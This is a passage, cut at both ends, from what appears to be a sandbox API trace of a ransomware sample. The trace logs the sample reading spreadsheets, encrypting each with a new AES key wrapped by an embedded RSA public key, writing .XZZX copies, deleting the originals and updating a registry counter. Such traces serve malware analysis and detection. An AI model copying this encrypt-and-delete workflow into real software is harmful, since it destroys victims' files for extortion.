HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned 118 [0042.990] StrStrW (lpFirst="qOmkS_BDD92-oYj.xls", lpSrch="XZZX") returned 0x0 [0042.990] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\qOmkS_BDD92-oYj.xls", dwFileAttributes=0x20) returned 1 [0042.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\qOmkS_BDD92-oYj.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\qomks_bdd92-oyj.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0042.990] ReadFile (in: hFile=0x4e4, lpBuffer=0x42faef0, nNumberOfBytesToRead=0xa2a8, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x42faef0*, lpNumberOfBytesRead=0x42ce418*=0xa2a8, lpOverlapped=0x0) returned 1 [0042.991] CloseHandle (hObject=0x4e4) returned 1 [0042.991] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0042.991] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0042.991] SetErrorMode (uMode=0x1) returned 0x1 [0042.991] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0042.992] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d4b20) returned 1 [0042.993] CryptGenKey (in: hProv=0x42d4b20, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e59d0) returned 1 [0043.157] CryptExportKey (in: hKey=0x42e59d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0043.157] CryptExportKey (in: hKey=0x42e59d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x42ce41c | out: pbData=0x3f00000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0043.157] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.158] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0043.158] CryptDestroyKey (hKey=0x42e59d0) returned 1 [0043.158] CryptReleaseContext (hProv=0x42d4b20, dwFlags=0x0) returned 0 [0043.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\E3E55C1830B142FC6C2B225E34DE2744.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\e3e55c1830b142fc6c2b225e34de2744.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e8 [0043.158] WriteFile (in: hFile=0x4e8, lpBuffer=0x42faef0*, nNumberOfBytesToWrite=0xa2a8, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42faef0*, lpNumberOfBytesWritten=0x42ce438*=0xa2a8, lpOverlapped=0x0) returned 1 [0043.159] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa2a8 [0043.159] WriteFile (in: hFile=0x4e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0043.159] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa2ad [0043.159] WriteFile (in: hFile=0x4e8, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x26, lpOverlapped=0x0) returned 1 [0043.159] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa2d3 [0043.159] WriteFile (in: hFile=0x4e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0043.159] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa2d8 [0043.159] SetErrorMode (uMode=0x1) returned 0x1 [0043.159] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0043.159] OutputDebugStringW (lpOutputString="end") [0043.160] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0043.160] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0043.160] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x42d4cb8) returned 1 [0043.160] CryptImportPublicKeyInfo (in: hCryptProv=0x42d4cb8, dwCertEncodingType=0x1, pInfo=0x3e3f080*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f0b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f0b8*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e59d0) returned 1 [0043.160] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.161] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0043.208] CryptEncrypt (in: hKey=0x42e59d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0043.208] CryptEncrypt (in: hKey=0x42e59d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d4dc8*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d4dc8*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0043.208] WriteFile (in: hFile=0x4e8, lpBuffer=0x42d4dc8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42d4dc8*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0043.208] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0043.208] WriteFile (in: hFile=0x4e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0043.208] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0043.208] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0043.208] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x4e4) returned 0x0 [0043.209] RegQueryValueExW (in: hKey=0x4e4, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x33, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0043.209] RegCloseKey (hKey=0x4e4) returned 0x0 [0043.209] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x4e4) returned 0x0 [0043.209] RegSetValueExW (in: hKey=0x4e4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x34, cbData=0x4 | out: lpData=0x42cdfec*=0x34) returned 0x0 [0043.209] RegCloseKey (hKey=0x4e4) returned 0x0 [0043.209] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.209] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.209] CloseHandle (hObject=0x4e8) returned 1 [0043.210] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0043.211] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0043.211] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\qOmkS_BDD92-oYj.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\qomks_bdd92-oyj.xls")) returned 1 [0043.212] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\qOmkS_BDD92-oYj.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\qomks_bdd92-oyj.xls")) returned 0 Thread: id = 146 os_tid = 0x930 [0043.161] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0043.161] lstrcpyW (in: lpString1=0x417f460, lpString2="seND1DmmOud5.xls" | out: lpString1="seND1DmmOud5.xls") returned="seND1DmmOud5.xls" [0043.161] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0043.161] SetErrorMode (uMode=0x1) returned 0x1 [0043.161] lstrcpyW (in: lpString1=0x417f860, lpString2="seND1DmmOud5.xls" | out: lpString1="seND1DmmOud5.xls") returned="seND1DmmOud5.xls" [0043.161] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x808d031b, Data2=0x95b0, Data3=0x48a4, Data4=([0]=0x8a, [1]=0xb1, [2]=0xd8, [3]=0xbe, [4]=0x73, [5]=0xaa, [6]=0xc0, [7]=0x9a))) returned 0x0 [0043.161] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\seND1DmmOud5.xls") returned 97 [0043.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0043.161] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\73C0D9902A7964C0808D031B2E914908.XZZX") returned 118 [0043.161] StrStrW (lpFirst="seND1DmmOud5.xls", lpSrch="XZZX") returned 0x0 [0043.161] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\seND1DmmOud5.xls", dwFileAttributes=0x20) returned 1 [0043.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\seND1DmmOud5.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\send1dmmoud5.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0043.162] ReadFile (in: hFile=0x4e4, lpBuffer=0x43051a0, nNumberOfBytesToRead=0xb2ac, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x43051a0*, lpNumberOfBytesRead=0x417e418*=0xb2ac, lpOverlapped=0x0) returned 1 [0043.162] CloseHandle (hObject=0x4e4) returned 1 [0043.162] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0043.163] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0043.163] SetErrorMode (uMode=0x1) returned 0x1 [0043.163] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0043.163] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d4d40) returned 1 [0043.165] CryptGenKey (in: hProv=0x42d4d40, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5a50) returned 1 [0043.293] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0043.293] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0043.293] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.294] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0043.294] CryptDestroyKey (hKey=0x42e5a50) returned 1 [0043.294] CryptReleaseContext (hProv=0x42d4d40, dwFlags=0x0) returned 1 [0043.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\73C0D9902A7964C0808D031B2E914908.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\73c0d9902a7964c0808d031b2e914908.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0043.295] WriteFile (in: hFile=0x4ec, lpBuffer=0x43051a0*, nNumberOfBytesToWrite=0xb2ac, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x43051a0*, lpNumberOfBytesWritten=0x417e438*=0xb2ac, lpOverlapped=0x0) returned 1 [0043.296] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb2ac [0043.296] WriteFile (in: hFile=0x4ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.296] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb2b1 [0043.296] WriteFile (in: hFile=0x4ec, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x20, lpOverlapped=0x0) returned 1 [0043.296] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb2d1 [0043.296] WriteFile (in: hFile=0x4ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.296] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb2d6 [0043.296] SetErrorMode (uMode=0x1) returned 0x1 [0043.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0043.296] OutputDebugStringW (lpOutputString="end") [0043.297] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0043.297] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0043.297] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d4d40) returned 1 [0043.297] CryptImportPublicKeyInfo (in: hCryptProv=0x42d4d40, dwCertEncodingType=0x1, pInfo=0x3e3f3c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f3f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f3f8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5b10) returned 1 [0043.297] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.298] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0043.298] CryptEncrypt (in: hKey=0x42e5b10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0043.298] CryptEncrypt (in: hKey=0x42e5b10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d4e50*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d4e50*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0043.298] WriteFile (in: hFile=0x4ec, lpBuffer=0x42d4e50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d4e50*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0043.298] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0043.298] WriteFile (in: hFile=0x4ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.298] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0043.299] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0043.299] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4e8) returned 0x0 [0043.299] RegQueryValueExW (in: hKey=0x4e8, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x34, lpcbData=0x417dfdc*=0x4) returned 0x0 [0043.299] RegCloseKey (hKey=0x4e8) returned 0x0 [0043.299] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4e8) returned 0x0 [0043.299] RegSetValueExW (in: hKey=0x4e8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x35, cbData=0x4 | out: lpData=0x417dfec*=0x35) returned 0x0 [0043.299] RegCloseKey (hKey=0x4e8) returned 0x0 [0043.299] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.299] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.300] CloseHandle (hObject=0x4ec) returned 1 [0043.301] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0043.301] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0043.302] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\seND1DmmOud5.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\send1dmmoud5.xls")) returned 1 [0043.303] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\seND1DmmOud5.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\send1dmmoud5.xls")) returned 0 Thread: id = 147 os_tid = 0x8f0 [0043.304] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 